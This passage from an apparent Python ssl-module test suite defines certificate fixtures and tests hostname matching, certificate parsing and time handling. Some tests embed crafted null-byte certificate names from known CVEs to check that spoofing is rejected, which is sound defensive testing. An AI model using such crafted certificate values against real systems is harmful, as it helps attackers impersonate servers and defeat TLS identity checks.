CERTFILE_PROTECTED = data_file("keycert.passwd.pem")
ONLYKEY_PROTECTED = data_file("ssl_key.passwd.pem")
KEY_PASSWORD = "somepass"
CAPATH = data_file("capath")
BYTES_CAPATH = os.fsencode(CAPATH)
CAFILE_NEURONIO = data_file("capath", "4e1295a3.0")
CAFILE_CACERT = data_file("capath", "5ed36f99.0")
CERTFILE_INFO = {
'issuer': ((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),)),
'notAfter': 'Aug 26 14:23:15 2028 GMT',
'notBefore': 'Aug 29 14:23:15 2018 GMT',
'serialNumber': '98A7CF88C74A32ED',
'subject': ((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),)),
'subjectAltName': (('DNS', 'localhost'),),
'version': 3
}
# empty CRL
CRLFILE = data_file("revocation.crl")
# Two keys and certs signed by the same CA (for SNI tests)
SIGNED_CERTFILE = data_file("keycert3.pem")
SIGNED_CERTFILE_HOSTNAME = 'localhost'
SIGNED_CERTFILE_INFO = {
'OCSP': ('http://testca.pythontest.net/testca/ocsp/',),
'caIssuers': ('http://testca.pythontest.net/testca/pycacert.cer',),
'crlDistributionPoints': ('http://testca.pythontest.net/testca/revocation.crl',),
'issuer': ((('countryName', 'XY'),),
(('organizationName', 'Python Software Foundation CA'),),
(('commonName', 'our-ca-server'),)),
'notAfter': 'Jul 7 14:23:16 2028 GMT',
'notBefore': 'Aug 29 14:23:16 2018 GMT',
'serialNumber': 'CB2D80995A69525C',
'subject': ((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),)),
'subjectAltName': (('DNS', 'localhost'),),
'version': 3
}
SIGNED_CERTFILE2 = data_file("keycert4.pem")
SIGNED_CERTFILE2_HOSTNAME = 'fakehostname'
SIGNED_CERTFILE_ECC = data_file("keycertecc.pem")
SIGNED_CERTFILE_ECC_HOSTNAME = 'localhost-ecc'
# Same certificate as pycacert.pem, but without extra text in file
SIGNING_CA = data_file("capath", "ceff1710.0")
# cert with all kinds of subject alt names
ALLSANFILE = data_file("allsans.pem")
IDNSANSFILE = data_file("idnsans.pem")
REMOTE_HOST = "self-signed.pythontest.net"
EMPTYCERT = data_file("nullcert.pem")
BADCERT = data_file("badcert.pem")
NONEXISTINGCERT = data_file("XXXnonexisting.pem")
BADKEY = data_file("badkey.pem")
NOKIACERT = data_file("nokia.pem")
NULLBYTECERT = data_file("nullbytecert.pem")
DHFILE = data_file("ffdh3072.pem")
BYTES_DHFILE = os.fsencode(DHFILE)
# Not defined in all versions of OpenSSL
OP_NO_COMPRESSION = getattr(ssl, "OP_NO_COMPRESSION", 0)
OP_SINGLE_DH_USE = getattr(ssl, "OP_SINGLE_DH_USE", 0)
OP_SINGLE_ECDH_USE = getattr(ssl, "OP_SINGLE_ECDH_USE", 0)
OP_CIPHER_SERVER_PREFERENCE = getattr(ssl, "OP_CIPHER_SERVER_PREFERENCE", 0)
OP_ENABLE_MIDDLEBOX_COMPAT = getattr(ssl, "OP_ENABLE_MIDDLEBOX_COMPAT", 0)
def handle_error(prefix):
exc_format = ' '.join(traceback.format_exception(*sys.exc_info()))
if support.verbose:
sys.stdout.write(prefix + exc_format)
def can_clear_options():
# 0.9.8m or higher
return ssl._OPENSSL_API_VERSION >= (0, 9, 8, 13, 15)
def no_sslv2_implies_sslv3_hello():
# 0.9.7h or higher
return ssl.OPENSSL_VERSION_INFO >= (0, 9, 7, 8, 15)
def have_verify_flags():
# 0.9.8 or higher
return ssl.OPENSSL_VERSION_INFO >= (0, 9, 8, 0, 15)
def _have_secp_curves():
if not ssl.HAS_ECDH:
return False
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
try:
ctx.set_ecdh_curve("secp384r1")
except ValueError:
return False
else:
return True
HAVE_SECP_CURVES = _have_secp_curves()
def utc_offset(): #NOTE: ignore issues like #1647654
# local time = utc time + utc offset
if time.daylight and time.localtime().tm_isdst > 0:
return -time.altzone # seconds
return -time.timezone
def asn1time(cert_time):
# Some versions of OpenSSL ignore seconds, see #18207
# 0.9.8.i
if ssl._OPENSSL_API_VERSION == (0, 9, 8, 9, 15):
fmt = "%b %d %H:%M:%S %Y GMT"
dt = datetime.datetime.strptime(cert_time, fmt)
dt = dt.replace(second=0)
cert_time = dt.strftime(fmt)
# %d adds leading zero but ASN1_TIME_print() uses leading space
if cert_time[4] == "0":
cert_time = cert_time[:4] + " " + cert_time[5:]
return cert_time
needs_sni = unittest.skipUnless(ssl.HAS_SNI, "SNI support needed for this test")
def test_wrap_socket(sock, ssl_version=ssl.PROTOCOL_TLS, *,
cert_reqs=ssl.CERT_NONE, ca_certs=None,
ciphers=None, certfile=None, keyfile=None,
**kwargs):
context = ssl.SSLContext(ssl_version)
if cert_reqs is not None:
if cert_reqs == ssl.CERT_NONE:
context.check_hostname = False
context.verify_mode = cert_reqs
if ca_certs is not None:
context.load_verify_locations(ca_certs)
if certfile is not None or keyfile is not None:
context.load_cert_chain(certfile, keyfile)
if ciphers is not None:
context.set_ciphers(ciphers)
return context.wrap_socket(sock, **kwargs)
def testing_context(server_cert=SIGNED_CERTFILE):
"""Create context
client_context, server_context, hostname = testing_context()
"""
if server_cert == SIGNED_CERTFILE:
hostname = SIGNED_CERTFILE_HOSTNAME
elif server_cert == SIGNED_CERTFILE2:
hostname = SIGNED_CERTFILE2_HOSTNAME
else:
raise ValueError(server_cert)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(server_cert)
    server_context.load_verify_locations(SIGNING_CA)
return client_context, server_context, hostname
class BasicSocketTests(unittest.TestCase):
def test_constants(self):
ssl.CERT_NONE
ssl.CERT_OPTIONAL
ssl.CERT_REQUIRED
ssl.OP_CIPHER_SERVER_PREFERENCE
ssl.OP_SINGLE_DH_USE
if ssl.HAS_ECDH:
ssl.OP_SINGLE_ECDH_USE
if ssl.OPENSSL_VERSION_INFO >= (1, 0):
ssl.OP_NO_COMPRESSION
self.assertIn(ssl.HAS_SNI, {True, False})
self.assertIn(ssl.HAS_ECDH, {True, False})
ssl.OP_NO_SSLv2
ssl.OP_NO_SSLv3
ssl.OP_NO_TLSv1
ssl.OP_NO_TLSv1_3
if ssl.OPENSSL_VERSION_INFO >= (1, 0, 1):
ssl.OP_NO_TLSv1_1
ssl.OP_NO_TLSv1_2
self.assertEqual(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv23)
def test_private_init(self):
with self.assertRaisesRegex(TypeError, "public constructor"):
with socket.socket() as s:
ssl.SSLSocket(s)
def test_str_for_enums(self):
# Make sure that the PROTOCOL_* constants have enum-like string
# reprs.
proto = ssl.PROTOCOL_TLS
self.assertEqual(str(proto), '_SSLMethod.PROTOCOL_TLS')
ctx = ssl.SSLContext(proto)
self.assertIs(ctx.protocol, proto)
def test_random(self):
v = ssl.RAND_status()
if support.verbose:
sys.stdout.write("\n RAND_status is %d (%s)\n"
% (v, (v and "sufficient randomness") or
"insufficient randomness"))
data, is_cryptographic = ssl.RAND_pseudo_bytes(16)
self.assertEqual(len(data), 16)
self.assertEqual(is_cryptographic, v == 1)
if v:
data = ssl.RAND_bytes(16)
self.assertEqual(len(data), 16)
else:
self.assertRaises(ssl.SSLError, ssl.RAND_bytes, 16)
# negative num is invalid
self.assertRaises(ValueError, ssl.RAND_bytes, -5)
self.assertRaises(ValueError, ssl.RAND_pseudo_bytes, -5)
if hasattr(ssl, 'RAND_egd'):
self.assertRaises(TypeError, ssl.RAND_egd, 1)
self.assertRaises(TypeError, ssl.RAND_egd, 'foo', 1)
ssl.RAND_add("this is a random string", 75.0)
ssl.RAND_add(b"this is a random bytes object", 75.0)
ssl.RAND_add(bytearray(b"this is a random bytearray object"), 75.0)
@unittest.skipUnless(os.name == 'posix', 'requires posix')
def test_random_fork(self):
status = ssl.RAND_status()
if not status:
self.fail("OpenSSL's PRNG has insufficient randomness")
rfd, wfd = os.pipe()
pid = os.fork()
if pid == 0:
try:
os.close(rfd)
child_random = ssl.RAND_pseudo_bytes(16)[0]
self.assertEqual(len(child_random), 16)
os.write(wfd, child_random)
os.close(wfd)
except BaseException:
os._exit(1)
else:
os._exit(0)
else:
os.close(wfd)
self.addCleanup(os.close, rfd)
_, status = os.waitpid(pid, 0)
self.assertEqual(status, 0)
child_random = os.read(rfd, 16)
self.assertEqual(len(child_random), 16)
parent_random = ssl.RAND_pseudo_bytes(16)[0]
self.assertEqual(len(parent_random), 16)
self.assertNotEqual(child_random, parent_random)
maxDiff = None
def test_parse_cert(self):
# note that this uses an 'unofficial' function in _ssl.c,
# provided solely for this test, to exercise the certificate
# parsing code
self.assertEqual(
ssl._ssl._test_decode_cert(CERTFILE),
CERTFILE_INFO
)
self.assertEqual(
ssl._ssl._test_decode_cert(SIGNED_CERTFILE),
SIGNED_CERTFILE_INFO
)
# Issue #13034: the subjectAltName in some certificates
# (notably projects.developer.nokia.com:443) wasn't parsed
p = ssl._ssl._test_decode_cert(NOKIACERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(p['subjectAltName'],
(('DNS', 'projects.developer.nokia.com'),
('DNS', 'projects.forum.nokia.com'))
)
# extra OCSP and AIA fields
self.assertEqual(p['OCSP'], ('http://ocsp.verisign.com',))
self.assertEqual(p['caIssuers'],
('http://SVRIntl-G3-aia.verisign.com/SVRIntlG3.cer',))
self.assertEqual(p['crlDistributionPoints'],
('http://SVRIntl-G3-crl.verisign.com/SVRIntlG3.crl',))
def test_parse_cert_CVE_2013_4238(self):
p = ssl._ssl._test_decode_cert(NULLBYTECERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
subject = ((('countryName', 'US'),),
(('stateOrProvinceName', 'Oregon'),),
(('localityName', 'Beaverton'),),
(('organizationName', 'Python Software Foundation'),),
(('organizationalUnitName', 'Python Core Development'),),
(('commonName', 'null.python.org\x00example.org'),),
(('emailAddress', 'python-dev@python.org'),))
self.assertEqual(p['subject'], subject)
self.assertEqual(p['issuer'], subject)
if ssl._OPENSSL_API_VERSION >= (0, 9, 8):
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', 'null@python.org\x00user@example.org'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '2001:DB8:0:0:0:0:0:1\n'))
else:
# OpenSSL 0.9.7 doesn't support IPv6 addresses in subjectAltName
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', 'null@python.org\x00user@example.org'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '<invalid>'))
self.assertEqual(p['subjectAltName'], san)
def test_parse_all_sans(self):
p = ssl._ssl._test_decode_cert(ALLSANFILE)
self.assertEqual(p['subjectAltName'],
(
('DNS', 'allsans'),
('othername', '<unsupported>'),
('othername', '<unsupported>'),
('email', 'user@example.org'),
('DNS', 'www.example.org'),
('DirName',
((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'dirname example'),))),
('URI', 'https://www.python.org/'),
('IP Address', '127.0.0.1'),
('IP Address', '0:0:0:0:0:0:0:1\n'),
('Registered ID', '1.2.3.4.5')
)
)
def test_DER_to_PEM(self):
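# Round-trip PEM -> DER -> PEM -> DER: the DER form must be stable and the
# regenerated PEM must carry the standard header and footer.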
with open(CAFILE_CACERT, 'r') as f:
pem = f.read()
d1 = ssl.PEM_cert_to_DER_cert(pem)
p2 = ssl.DER_cert_to_PEM_cert(d1)
d2 = ssl.PEM_cert_to_DER_cert(p2)
self.assertEqual(d1, d2)
if not p2.startswith(ssl.PEM_HEADER + '\n'):
self.fail("DER-to-PEM didn't include correct header:\n%r\n" % p2)
if not p2.endswith('\n' + ssl.PEM_FOOTER + '\n'):
self.fail("DER-to-PEM didn't include correct footer:\n%r\n" % p2)
def test_openssl_version(self):
n = ssl.OPENSSL_VERSION_NUMBER
t = ssl.OPENSSL_VERSION_INFO
s = ssl.OPENSSL_VERSION
self.assertIsInstance(n, int)
self.assertIsInstance(t, tuple)
self.assertIsInstance(s, str)
# Some sanity checks follow
# >= 0.9
self.assertGreaterEqual(n, 0x900000)
# < 3.0
self.assertLess(n, 0x30000000)
major, minor, fix, patch, status = t
self.assertGreaterEqual(major, 0)
self.assertLess(major, 3)
self.assertGreaterEqual(minor, 0)
self.assertLess(minor, 256)
self.assertGreaterEqual(fix, 0)
self.assertLess(fix, 256)
self.assertGreaterEqual(patch, 0)
self.assertLessEqual(patch, 63)
self.assertGreaterEqual(status, 0)
self.assertLessEqual(status, 15)
# Version string as returned by {Open,Libre}SSL; the format might change.
if IS_LIBRESSL:
self.assertTrue(s.startswith("LibreSSL {:d}".format(major)),
(s, t, hex(n)))
else:
self.assertTrue(s.startswith("OpenSSL {:d}.{:d}.{:d}".format(major, minor, fix)),
(s, t, hex(n)))
@support.cpython_only
def test_refcycle(self):
# Issue #7943: an SSL object doesn't create reference cycles with
# itself.
s = socket.socket(socket.AF_INET)
ss = test_wrap_socket(s)
wr = weakref.ref(ss)
with support.check_warnings(("", ResourceWarning)):
del ss
self.assertEqual(wr(), None)
def test_wrapped_unconnected(self):
# Methods on an unconnected SSLSocket propagate the original
# OSError raised by the underlying socket object.
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s) as ss:
self.assertRaises(OSError, ss.recv, 1)
self.assertRaises(OSError, ss.recv_into, bytearray(b'x'))
self.assertRaises(OSError, ss.recvfrom, 1)
self.assertRaises(OSError, ss.recvfrom_into, bytearray(b'x'), 1)
self.assertRaises(OSError, ss.send, b'x')
self.assertRaises(OSError, ss.sendto, b'x', ('0.0.0.0', 0))
self.assertRaises(NotImplementedError, ss.sendmsg,
[b'x'], (), 0, ('0.0.0.0', 0))
def test_timeout(self):
# Issue #8524: when creating an SSL socket, the timeout of the
# original socket should be retained.
for timeout in (None, 0.0, 5.0):
s = socket.socket(socket.AF_INET)
s.settimeout(timeout)
with test_wrap_socket(s) as ss:
self.assertEqual(timeout, ss.gettimeout())
def test_errors_sslwrap(self):
sock = socket.socket()
self.assertRaisesRegex(ValueError,
"certfile must be specified",
ssl.wrap_socket, sock, keyfile=CERTFILE)
self.assertRaisesRegex(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True)
self.assertRaisesRegex(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True, certfile="")
with ssl.wrap_socket(sock, server_side=True, certfile=CERTFILE) as s:
self.assertRaisesRegex(ValueError, "can't connect in server-side mode",
s.connect, (HOST, 8080))
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock, certfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock,
certfile=CERTFILE, keyfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock,
certfile=NONEXISTINGCERT, keyfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
def bad_cert_test(self, certfile):
"""Check that trying to use the given client certificate fails"""
certfile = os.path.join(os.path.dirname(__file__) or os.curdir,
certfile)
sock = socket.socket()
self.addCleanup(sock.close)
with self.assertRaises(ssl.SSLError):
test_wrap_socket(sock,
certfile=certfile)
def test_empty_cert(self):
"""Wrapping with an empty cert file"""
self.bad_cert_test("nullcert.pem")
def test_malformed_cert(self):
"""Wrapping with a badly formatted certificate (syntax error)"""
self.bad_cert_test("badcert.pem")
def test_malformed_key(self):
"""Wrapping with a badly formatted key (syntax error)"""
self.bad_cert_test("badkey.pem")
def test_match_hostname(self):
def ok(cert, hostname):
ssl.match_hostname(cert, hostname)
def fail(cert, hostname):
self.assertRaises(ssl.CertificateError,
ssl.match_hostname, cert, hostname)
# -- Hostname matching --
cert = {'subject': ((('commonName', 'example.com'),),)}
ok(cert, 'example.com')
ok(cert, 'ExAmple.cOm')
fail(cert, 'www.example.com')
fail(cert, '.example.com')
fail(cert, 'example.org')
fail(cert, 'exampleXcom')
cert = {'subject': ((('commonName', '*.a.com'),),)}
ok(cert, 'foo.a.com')
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
# Only match a wildcard when it is the only thing in the
# left-most segment (partial wildcards such as 'f*' don't match).
cert = {'subject': ((('commonName', 'f*.com'),),)}
fail(cert, 'foo.com')
fail(cert, 'f.com')
fail(cert, 'bar.com')
fail(cert, 'foo.a.com')
fail(cert, 'bar.foo.com')
# NULL bytes are bad, CVE-2013-4073
cert = {'subject': ((('commonName',
'null.python.org\x00example.org'),),)}
ok(cert, 'null.python.org\x00example.org') # or raise an error?
fail(cert, 'example.org')
fail(cert, 'null.python.org')
# error cases with wildcards
cert = {'subject': ((('commonName', '*.*.a.com'),),)}
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
cert = {'subject': ((('commonName', 'a.*.com'),),)}
fail(cert, 'a.foo.com')
fail(cert, 'a..com')
fail(cert, 'a.com')
# wildcard doesn't match IDNA prefix 'xn--'
idna = 'püthon.python.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
ok(cert, idna)
cert = {'subject': ((('commonName', 'x*.python.org'),),)}
fail(cert, idna)
cert = {'subject': ((('commonName', 'xn--p*.python.org'),),)}
fail(cert, idna)
# A wildcard in the first fragment combined with IDNA A-labels in
# subsequent fragments is rejected; every check below must fail.
idna = 'www*.pythön.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
fail(cert, 'www.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'www1.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'ftp.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'pythön.org'.encode("idna").decode("ascii"))
# Slightly fake real-world example
cert = {'notAfter': 'Jun 26 21:41:46 2011 GMT',
'subject': ((('commonName', 'linuxfrz.org'),),),
'subjectAltName': (('DNS', 'linuxfr.org'),
('DNS', 'linuxfr.com'),
('othername', '<unsupported>'))}
ok(cert, 'linuxfr.org')
ok(cert, 'linuxfr.com')
# Not a "DNS" entry
fail(cert, '<unsupported>')
# When there is a subjectAltName, commonName isn't used
fail(cert, 'linuxfrz.org')
# A pristine real-world example
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),),
(('commonName', 'mail.google.com'),))}
ok(cert, 'mail.google.com')
fail(cert, 'gmail.com')
# Only commonName is considered
fail(cert, 'California')
# -- IPv4 matching --
cert = {'subject': ((('commonName', 'example.com'),),),
'subjectAltName': (('DNS', 'example.com'),
('IP Address', '10.11.12.13'),
('IP Address', '14.15.16.17'))}
ok(cert, '10.11.12.13')
ok(cert, '14.15.16.17')
fail(cert, '14.15.16.18')
fail(cert, 'example.net')
# -- IPv6 matching --
if hasattr(socket, 'AF_INET6'):
cert = {'subject': ((('commonName', 'example.com'),),),
'subjectAltName': (
('DNS', 'example.com'),
('IP Address', '2001:0:0:0:0:0:0:CAFE\n'),
('IP Address', '2003:0:0:0:0:0:0:BABA\n'))}
ok(cert, '2001::cafe')
ok(cert, '2003::baba')
fail(cert, '2003::bebe')
fail(cert, 'example.net')
# -- Miscellaneous --
# Neither commonName nor subjectAltName
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),))}
fail(cert, 'mail.google.com')
# No DNS entry in subjectAltName but a commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('commonName', 'mail.google.com'),)),
'subjectAltName': (('othername', 'blabla'), )}
ok(cert, 'mail.google.com')
# No DNS entry in subjectAltName and no commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),)),
'subjectAltName': (('othername', 'blabla'),)}
fail(cert, 'google.com')
# Empty cert / no cert
self.assertRaises(ValueError, ssl.match_hostname, None, 'example.com')
self.assertRaises(ValueError, ssl.match_hostname, {}, 'example.com')
# Issue #17980: avoid denials of service by refusing more than one
# wildcard per fragment.
cert = {'subject': ((('commonName', 'a*b.example.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"partial wildcards in leftmost label are not supported"):
ssl.match_hostname(cert, 'axxb.example.com')
cert = {'subject': ((('commonName', 'www.*.example.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"wildcard can only be present in the leftmost label"):
ssl.match_hostname(cert, 'www.sub.example.com')
cert = {'subject': ((('commonName', 'a*b*.example.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"too many wildcards"):
ssl.match_hostname(cert, 'axxbxxc.example.com')
cert = {'subject': ((('commonName', '*'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"sole wildcard without additional labels are not support"):
ssl.match_hostname(cert, 'host')
cert = {'subject': ((('commonName', '*.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
r"hostname 'com' doesn't match '\*.com'"):
ssl.match_hostname(cert, 'com')
# extra checks for _inet_paton()
for invalid in ['1', '', '1.2.3', '256.0.0.1', '127.0.0.1/24']:
with self.assertRaises(ValueError):
ssl._inet_paton(invalid)
for ipaddr in ['127.0.0.1', '192.168.0.1']:
self.assertTrue(ssl._inet_paton(ipaddr))
if hasattr(socket, 'AF_INET6'):
for ipaddr in ['::1', '2001:db8:85a3::8a2e:370:7334']:
self.assertTrue(ssl._inet_paton(ipaddr))
def test_server_side(self):
# server_hostname doesn't work for server sockets
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
with socket.socket() as sock:
self.assertRaises(ValueError, ctx.wrap_socket, sock, True,
server_hostname="some.hostname")
def test_unknown_channel_binding(self):
# should raise ValueError for unknown type
s = socket.socket(socket.AF_INET)
s.bind(('127.0.0.1', 0))
s.listen()
c = socket.socket(socket.AF_INET)
c.connect(s.getsockname())
with test_wrap_socket(c, do_handshake_on_connect=False) as ss:
with self.assertRaises(ValueError):
ss.get_channel_binding("unknown-type")
s.close()
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
# an unconnected socket should return None for a known channel binding type
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
# the same for server-side
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s, server_side=True, certfile=CERTFILE) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
def test_dealloc_warn(self):
ss = test_wrap_socket(socket.socket(socket.AF_INET))
r = repr(ss)
with self.assertWarns(ResourceWarning) as cm:
ss = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
def test_get_default_verify_paths(self):
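# The result is a 6-field named tuple that also honours the SSL_CERT_DIR
# and SSL_CERT_FILE environment variables.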
paths = ssl.get_default_verify_paths()
self.assertEqual(len(paths), 6)
self.assertIsInstance(paths, ssl.DefaultVerifyPaths)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
paths = ssl.get_default_verify_paths()
self.assertEqual(paths.cafile, CERTFILE)
self.assertEqual(paths.capath, CAPATH)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_certificates(self):
self.assertTrue(ssl.enum_certificates("CA"))
self.assertTrue(ssl.enum_certificates("ROOT"))
self.assertRaises(TypeError, ssl.enum_certificates)
self.assertRaises(WindowsError, ssl.enum_certificates, "")
trust_oids = set()
for storename in ("CA", "ROOT"):
store = ssl.enum_certificates(storename)
self.assertIsInstance(store, list)
for element in store:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 3)
cert, enc, trust = element
self.assertIsInstance(cert, bytes)
self.assertIn(enc, {"x509_asn", "pkcs_7_asn"})
self.assertIsInstance(trust, (set, bool))
if isinstance(trust, set):
trust_oids.update(trust)
serverAuth = "1.3.6.1.5.5.7.3.1"
self.assertIn(serverAuth, trust_oids)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_crls(self):
self.assertTrue(ssl.enum_crls("CA"))
self.assertRaises(TypeError, ssl.enum_crls)
self.assertRaises(WindowsError, ssl.enum_crls, "")
crls = ssl.enum_crls("CA")
self.assertIsInstance(crls, list)
for element in crls:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 2)
self.assertIsInstance(element[0], bytes)
self.assertIn(element[1], {"x509_asn", "pkcs_7_asn"})
def test_asn1object(self):
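# _ASN1Object can be built from an OID string, an NID or a name, and
# always exposes nid, shortname, longname and oid.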
expected = (129, 'serverAuth', 'TLS Web Server Authentication',
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertEqual(val, expected)
self.assertEqual(val.nid, 129)
self.assertEqual(val.shortname, 'serverAuth')
self.assertEqual(val.longname, 'TLS Web Server Authentication')
self.assertEqual(val.oid, '1.3.6.1.5.5.7.3.1')
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object, 'serverAuth')
val = ssl._ASN1Object.fromnid(129)
self.assertEqual(val, expected)
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object.fromnid, -1)
with self.assertRaisesRegex(ValueError, "unknown NID 100000"):
ssl._ASN1Object.fromnid(100000)
for i in range(1000):
try:
obj = ssl._ASN1Object.fromnid(i)
except ValueError:
pass
else:
self.assertIsInstance(obj.nid, int)
self.assertIsInstance(obj.shortname, str)
self.assertIsInstance(obj.longname, str)
self.assertIsInstance(obj.oid, (str, type(None)))
val = ssl._ASN1Object.fromname('TLS Web Server Authentication')
self.assertEqual(val, expected)
self.assertIsInstance(val, ssl._ASN1Object)
self.assertEqual(ssl._ASN1Object.fromname('serverAuth'), expected)
self.assertEqual(ssl._ASN1Object.fromname('1.3.6.1.5.5.7.3.1'),
expected)
with self.assertRaisesRegex(ValueError, "unknown object 'serverauth'"):
ssl._ASN1Object.fromname('serverauth')
def test_purpose_enum(self):
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertIsInstance(ssl.Purpose.SERVER_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.SERVER_AUTH, val)
self.assertEqual(ssl.Purpose.SERVER_AUTH.nid, 129)
self.assertEqual(ssl.Purpose.SERVER_AUTH.shortname, 'serverAuth')
self.assertEqual(ssl.Purpose.SERVER_AUTH.oid,
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.2')
self.assertIsInstance(ssl.Purpose.CLIENT_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.CLIENT_AUTH, val)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.nid, 130)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.shortname, 'clientAuth')
self.assertEqual(ssl.Purpose.CLIENT_AUTH.oid,
'1.3.6.1.5.5.7.3.2')
def test_unsupported_dtls(self):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
with self.assertRaises(NotImplementedError) as cx:
test_wrap_socket(s, cert_reqs=ssl.CERT_NONE)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with self.assertRaises(NotImplementedError) as cx:
ctx.wrap_socket(s)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
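# Helpers: assert that cert_time_to_seconds() maps a timestring to the
# expected timestamp, or rejects it with ValueError.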
def cert_time_ok(self, timestring, timestamp):
self.assertEqual(ssl.cert_time_to_seconds(timestring), timestamp)
def cert_time_fail(self, timestring):
with self.assertRaises(ValueError):
ssl.cert_time_to_seconds(timestring)
@unittest.skipUnless(utc_offset(),
'local time needs to be different from UTC')
def test_cert_time_to_seconds_timezone(self):
# Issue #19940: ssl.cert_time_to_seconds() returns wrong
# results if local timezone is not UTC
self.cert_time_ok("May 9 00:00:00 2007 GMT", 1178668800.0)
self.cert_time_ok("Jan 5 09:34:43 2018 GMT", 1515144883.0)
def test_cert_time_to_seconds(self):
timestring = "Jan 5 09:34:43 2018 GMT"
ts = 1515144883.0
self.cert_time_ok(timestring, ts)
# accept keyword parameter, assert its name
self.assertEqual(ssl.cert_time_to_seconds(cert_time=timestring), ts)
# accept both %e and %d (space or zero generated by strftime)
self.cert_time_ok("Jan 05 09:34:43 2018 GMT", ts)
# case-insensitive
self.cert_time_ok("JaN 5 09:34:43 2018 GmT", ts)
self.cert_time_fail("Jan 5 09:34 2018 GMT") # no seconds
self.cert_time_fail("Jan 5 09:34:43 2018") # no GMT
self.cert_time_fail("Jan 5 09:34:43 2018 UTC") # not GMT timezone
self.cert_time_fail("Jan 35 09:34:43 2018 GMT") # invalid day
